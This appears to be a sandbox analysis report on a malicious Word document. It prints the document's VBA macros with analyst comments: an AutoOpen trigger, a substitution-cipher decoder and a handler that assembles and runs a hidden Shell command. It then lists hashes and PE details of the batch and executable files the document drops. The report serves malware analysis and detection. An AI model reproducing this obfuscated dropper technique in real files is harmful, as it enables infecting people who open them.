Word Doc. Drops Context Aware Payload | Files
File Information
Sample files count 1
Created files count 6
Modified files count 0
c:\users\adu0vk iwa5kls\desktop\2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc
File Properties
Names c:\users\adu0vk iwa5kls\desktop\2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc (Sample File)
Size 99.50 KB (101888 bytes)
Hash Values MD5: 8c16de37cccc9788384adb61c118ba2c
SHA1: c54b16bd6a507bbbb832c4c62b894f426acecf31
SHA256: 2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca
VBA Information
VBA Properties
Module Count 7
Macro Count 10
ThisDocument.cls - Activate Workbook
Sub autoopen()
' Auto-executing entry point: Word runs a macro named AutoOpen when the
' document is opened, without any user action beyond enabling macros.
' The only work done here is calling myfunc1 (NewMacros.bas), which writes
' to a form textbox and thereby fires myform1.TextBox1_Change, where the
' actual command is assembled and executed.
myfunc1
End Sub
Module1.bas - Eventless
Function generateFuncName()
' Builds a random identifier: first character drawn from myform1.firstSymbol,
' middle characters from UserForm1.middleSymbol1, last character from
' UserForm1.lastSymbol. The character pools are form control properties that
' are not visible in this listing. The body is identical to generateArgName
' and differs from generateFileName1/2 (Module4.bas) only in the middle pool.
Randomize
' Int(9 * Rnd) is 0..8, so countSymbols is 4..12.
countSymbols = CInt(Int((9 * Rnd()) + 4))
' Int((Len + 1) * Rnd) + 1 ranges over 1..Len+1; when it hits Len+1, Mid
' returns "" and the generated name comes out one character short.
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gName = Mid(myform1.firstSymbol, symbolRand, 1)
' countSymbols - 2 middle characters, same index range caveat as above.
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol1) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.middleSymbol1, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateFuncName = gName
End Function
           
Function generateArgName()
' Byte-for-byte the same body as generateFuncName: a random 4..12 character
' identifier assembled from the firstSymbol / middleSymbol1 / lastSymbol
' form properties. Used in TextBox1_Change for the argument name spliced
' into the decoded command text.
Randomize
' Int(9 * Rnd) is 0..8, so countSymbols is 4..12.
countSymbols = CInt(Int((9 * Rnd()) + 4))
' Index range is 1..Len+1; an index of Len+1 makes Mid return "" (name one
' character shorter than countSymbols).
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gName = Mid(myform1.firstSymbol, symbolRand, 1)
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol1) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.middleSymbol1, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gName = gName + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateArgName = gName
End Function
Module2.bas - Eventless
Function createTextString(str)
' Stores str in myform1.TextBox2, the staging buffer that TextBox1_Change
' later hands to Shell. Keeping the assembled command in a form control
' rather than a module variable keeps it out of the module source.
' Declared as a Function but never assigns a return value.
myform1.TextBox2 = str
End Function
Module3.bas - Eventless
Function getCharReverse(b As String, key As Integer) As String
' Reverse substitution over the custom alphabet held in myform1.alphabet:
' finds the 1-based position of b, shifts it back by key with wraparound,
' and returns the character at the shifted position. Together with decode
' this is the deobfuscation routine for the encoded command fragments.
Dim num As Integer
num = 0
Count = Len(myform1.alphabet)
' Linear scan for the first occurrence of b; num stays 0 if b is absent.
' Whether the comparison is case-sensitive depends on the module's
' Option Compare setting, which is not shown here.
For i = 1 To Count
If (Mid(myform1.alphabet, i, 1) = b) Then
    num = i
    Exit For
End If
Next i
' Wrap around when the backward shift lands at or below position 0. A
' character absent from the alphabet (num = 0) still maps to position
' Len - key instead of raising an error, so unknown input is silently
' substituted rather than rejected.
num = IIf(num - key <= 0, Len(myform1.alphabet) + num - key, num - key)
getCharReverse = Mid(myform1.alphabet, num, 1)
End Function

Function decode(code)
' Decodes an obfuscated string by applying getCharReverse to every character
' with the shift stored in myform1.key. Because both the alphabet and the
' key live in form properties, a static extractor that only dumps module
' source will not recover the plaintext; the form stream has to be parsed too.
dec = ""
Count = Len(code)
For i = 1 To Count
dec = dec + getCharReverse(Mid(code, i, 1), myform1.key)
Next i
decode = dec
End Function
Module4.bas - Eventless
Function generateFileName1()
' Random 4..12 character name, same construction as generateFuncName but
' drawing the middle characters from UserForm1.middleSymbol2 instead of
' middleSymbol1. Used in TextBox1_Change as the first dropped-file name;
' the randomly named files in this report's created-file list
' (e.g. mbovxo.bat under %TEMP%) are consistent with such a generator,
' though the decoded command text is not shown here.
Randomize
' Int(9 * Rnd) is 0..8, so countSymbols is 4..12.
countSymbols = CInt(Int((9 * Rnd()) + 4))
' Index range is 1..Len+1; index Len+1 makes Mid return "" (one char short).
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gn = Mid(myform1.firstSymbol, symbolRand, 1)
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol2) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.middleSymbol2, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateFileName1 = gn
End Function

Function generateFileName2()
' Identical body to generateFileName1: random 4..12 character name using
' firstSymbol / middleSymbol2 / lastSymbol. Used in TextBox1_Change as the
' second dropped-file name.
Randomize
' Int(9 * Rnd) is 0..8, so countSymbols is 4..12.
countSymbols = CInt(Int((9 * Rnd()) + 4))
' Index range is 1..Len+1; index Len+1 makes Mid return "" (one char short).
symbolRand = CInt(Int(((Len(myform1.firstSymbol) + 1) * Rnd()) + 1))
gn = Mid(myform1.firstSymbol, symbolRand, 1)
For i = 2 To countSymbols - 1
symbolRand = CInt(Int(((Len(UserForm1.middleSymbol2) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.middleSymbol2, symbolRand, 1)
Next i
symbolRand = CInt(Int(((Len(UserForm1.lastSymbol) + 1) * Rnd()) + 1))
gn = gn + Mid(UserForm1.lastSymbol, symbolRand, 1)

generateFileName2 = gn
End Function
myform1.frm - Eventless
Private Sub TextBox1_Change()
' Change handler on myform1.TextBox1. It fires when myfunc1 (NewMacros.bas)
' writes "111" to the textbox, which is how autoopen reaches this code
' without a direct call. It assembles a command line from encoded fragments
' and generated names, stages it in TextBox2 and executes it hidden.
' Encoded fragments kept inline; enc1, enc3 and enc9 are read from UserForm1
' and enc10 from myform1, none of which are visible in this listing, so the
' full plaintext cannot be reconstructed from the module source alone.
enc2 = "2dHoi]/lfq*"
enc4 = "Wrr(O!S(4"
enc5 = "Eunurr3vHogiowSiamuhhqrr(O!S(4"
enc6 = "EunurrvFoipD"
enc7 = "2rr;oosCRRyyyEu,u/oh8[EmbRxgh67Es/lrr3Fmgom;D"
enc8 = "2rr;oosCRRoiulgio;gwj]//]uEmaE[xRxgh67Es/lrr3FrVVqeqA[owK]cuqwu/maj]/lqGHM}}qwK]cuSgo;q(O!S(4"

' Fresh random identifiers on every run: a function name, an argument name
' and two file names. Each is spliced into the command twice (see below),
' so the same random token is reused consistently within one execution.
fn = generateFuncName
argName = generateArgName
fn1 = generateFileName1
fn2 = generateFileName2

' Decoded fragments interleaved with the generated names; the result is
' written to myform1.TextBox2 by createTextString rather than returned.
createTextString (decode(UserForm1.enc1) + fn + decode(enc2) + argName + decode(UserForm1.enc3) + argName + decode(enc4) + fn1 + decode(enc5) + fn1 + decode(enc6) + fn + decode(enc7) + fn + decode(enc8) + fn2 + decode(UserForm1.enc9) + fn2 + decode(myform1.enc10))

' Executes the staged command; window style 0 (vbHide) suppresses any
' visible window. From a detection standpoint the observable behaviour is
' the Word process spawning a child via Shell with a hidden window, followed
' by the %TEMP% .bat and .exe drops listed in this report.
Shell myform1.TextBox2, 0
End Sub
NewMacros.bas - Eventless
Sub myfunc1()
' Called from autoopen. Assigning to TextBox1 raises its Change event, so
' this one-line sub is the trigger for myform1.TextBox1_Change, where the
' command is built and executed. The value "111" itself is never used; any
' change to the textbox would have the same effect.
myform1.TextBox1 = "111"
End Sub
c:\users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat
File Properties
Names c:\users\adu0vk iwa5kls\appdata\local\temp\mbovxo.bat (Created File)
Size 0.32 KB (332 bytes)
Hash Values MD5: 6b02cf51939341cf79053976790bdae0
SHA1: 7d1615ea6d3afc59f7f518b1fd49bd0ae2c2b1ed
SHA256: 845ed9e3626f3b603301c7ab1987d763c13a9d8ee4444e69f181e52ebb881252
c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe, ...
File Properties
Names c:\users\adu0vk iwa5kls\appdata\local\temp\mvmubw.exe (Created File)
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe (Created File)
Size 472.00 KB (483328 bytes)
Hash Values MD5: 0ebfd6e45dea48c7f54b5574d69da458
SHA1: 11ad0fae8318bc72e1525c161c5df72a9da9430b
SHA256: 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581
PE Information
File Properties
Image Base 0x400000
Entry Point 0x411737
Size Of Code 0x2e000
Size Of Initialized Data 0x47000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2016-10-27 14:41:08
Compiler/Packer Armadillo v1.71
Sections (4)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2d6ec 0x2e000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 6.65
.rdata 0x42f000 0xdfa6 0xe000 0x2f000 CNT_INITIALIZED_DATA, MEM_READ 6.13
.data 0x43d000 0x95ac 0xa000 0x3d000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 5.81
.rsrc 0x447000 0x2ef70 0x2f000 0x47000 CNT_INITIALIZED_DATA, MEM_READ 6.94
Imports (68)
USER32.dll (36)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
TranslateMessage 0x0 0x42f090 0x3cab4 0x3cab4
DispatchMessageW 0x0 0x42f094 0x3cab8 0x3cab8
LoadCursorW 0x0 0x42f098 0x3cabc 0x3cabc
RegisterClassExW 0x0 0x42f09c 0x3cac0 0x3cac0
BeginPaint 0x0 0x42f0a0 0x3cac4 0x3cac4
GetWindowRect 0x0 0x42f0a4 0x3cac8 0x3cac8
MoveWindow 0x0 0x42f0a8 0x3cacc 0x3cacc
PostQuitMessage 0x0 0x42f0ac 0x3cad0 0x3cad0
MessageBoxW 0x0 0x42f0b0 0x3cad4 0x3cad4
DefWindowProcW 0x0 0x42f0b4 0x3cad8 0x3cad8
DestroyWindow 0x0 0x42f0b8 0x3cadc 0x3cadc
SendMessageW 0x0 0x42f0bc 0x3cae0 0x3cae0
LoadStringW 0x0 0x42f0c0 0x3cae4 0x3cae4
CreateWindowExW 0x0 0x42f0c4 0x3cae8 0x3cae8
DestroyCursor 0x0 0x42f0c8 0x3caec 0x3caec
GetDlgItemInt 0x0 0x42f0cc 0x3caf0 0x3caf0
LoadAcceleratorsW 0x0 0x42f0d0 0x3caf4 0x3caf4
EndPaint 0x0 0x42f0d4 0x3caf8 0x3caf8
GetMessageW 0x0 0x42f0d8 0x3cafc 0x3cafc
SetMenuItemInfoW 0x0 0x42f0dc 0x3cb00 0x3cb00
GetClassNameW 0x0 0x42f0e0 0x3cb04 0x3cb04
SetMenu 0x0 0x42f0e4 0x3cb08 0x3cb08
PtInRect 0x0 0x42f0e8 0x3cb0c 0x3cb0c
InflateRect 0x0 0x42f0ec 0x3cb10 0x3cb10
DrawIcon 0x0 0x42f0f0 0x3cb14 0x3cb14
InsertMenuItemW 0x0 0x42f0f4 0x3cb18 0x3cb18
GetDesktopWindow 0x0 0x42f0f8 0x3cb1c 0x3cb1c
GetDCEx 0x0 0x42f0fc 0x3cb20 0x3cb20
SetScrollRange 0x0 0x42f100 0x3cb24 0x3cb24
GetActiveWindow 0x0 0x42f104 0x3cb28 0x3cb28
GetDlgItemTextW 0x0 0x42f108 0x3cb2c 0x3cb2c
RedrawWindow 0x0 0x42f10c 0x3cb30 0x3cb30
InsertMenuW 0x0 0x42f110 0x3cb34 0x3cb34
GetDlgCtrlID 0x0 0x42f114 0x3cb38 0x3cb38
GetFocus 0x0 0x42f118 0x3cb3c 0x3cb3c
GetScrollRange 0x0 0x42f11c 0x3cb40 0x3cb40
KERNEL32.dll (15)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
WriteFile 0x0 0x42f008 0x3ca2c 0x3ca2c
lstrlenA 0x0 0x42f00c 0x3ca30 0x3ca30
lstrcmpA 0x0 0x42f010 0x3ca34 0x3ca34
CloseHandle 0x0 0x42f014 0x3ca38 0x3ca38
GetFileSize 0x0 0x42f018 0x3ca3c 0x3ca3c
GetModuleHandleW 0x0 0x42f01c 0x3ca40 0x3ca40
GetStartupInfoA 0x0 0x42f020 0x3ca44 0x3ca44
GetLastError 0x0 0x42f024 0x3ca48 0x3ca48
GetModuleHandleA 0x0 0x42f028 0x3ca4c 0x3ca4c
GetCurrentDirectoryW 0x0 0x42f02c 0x3ca50 0x3ca50
lstrlenW 0x0 0x42f030 0x3ca54 0x3ca54
GetCommandLineW 0x0 0x42f034 0x3ca58 0x3ca58
lstrcpyW 0x0 0x42f038 0x3ca5c 0x3ca5c
CreateFileMappingW 0x0 0x42f03c 0x3ca60 0x3ca60
CreateFileW 0x0 0x42f040 0x3ca64 0x3ca64
GDI32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
TextOutW 0x0 0x42f000 0x3ca24 0x3ca24
SHELL32.dll (2)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
ExtractIconW 0x0 0x42f084 0x3caa8 0x3caa8
CommandLineToArgvW 0x0 0x42f088 0x3caac 0x3caac
MSVCRT.dll (14)
API Name Ordinal IAT Address Thunk RVA Thunk Offset
_exit 0x0 0x42f048 0x3ca6c 0x3ca6c
_XcptFilter 0x0 0x42f04c 0x3ca70 0x3ca70
exit 0x0 0x42f050 0x3ca74 0x3ca74
_acmdln 0x0 0x42f054 0x3ca78 0x3ca78
__getmainargs 0x0 0x42f058 0x3ca7c 0x3ca7c
_initterm 0x0 0x42f05c 0x3ca80 0x3ca80
__setusermatherr 0x0 0x42f060 0x3ca84 0x3ca84
_adjust_fdiv 0x0 0x42f064 0x3ca88 0x3ca88
__p__commode 0x0 0x42f068 0x3ca8c 0x3ca8c
__p__fmode 0x0 0x42f06c 0x3ca90 0x3ca90
__set_app_type 0x0 0x42f070 0x3ca94 0x3ca94
_except_handler3 0x0 0x42f074 0x3ca98 0x3ca98
_controlfp 0x0 0x42f078 0x3ca9c 0x3ca9c
memset 0x0 0x42f07c 0x3caa0 0x3caa0
Icons (1)
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe
File Properties
Names c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\client_id
File Properties
Names c:\users\adu0vk iwa5kls\appdata\roaming\winapp\client_id (Created File)
Size 0.10 KB (106 bytes)
Hash Values MD5: c9e2607b0faa2a1d36e4ebc553f41698
SHA1: b8c4d60f72d70bbf8ce3ff1e16f7fe659cda9821
SHA256: fa6c18a934575a42088ed671a0bb0de633b8f00e1226a38596f6b625c1455e3e
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag
File Properties
Names c:\users\adu0vk iwa5kls\appdata\roaming\winapp\group_tag (Created File)
Size 0.01 KB (12 bytes)
Hash Values MD5: 20d4581a76fac9a75b1300485c2c2ce4
SHA1: 56f0501fc59c0a9f5f6967cd7f03e5d4f5b8adf6
SHA256: 60e79d113cf1adb6e594a3ab1eef644f274cfaf004b576b6592da7aa6119b67d
c:\users\adu0vk~1\appdata\local\temp\~dfd532346fbcb353e3.tmp
File Properties
Names c:\users\adu0vk~1\appdata\local\temp\~dfd532346fbcb353e3.tmp (Created File)
Size 0.50 KB (512 bytes)
Hash Values MD5: bf619eac0cdf3f68d496ea9344137e8b
SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560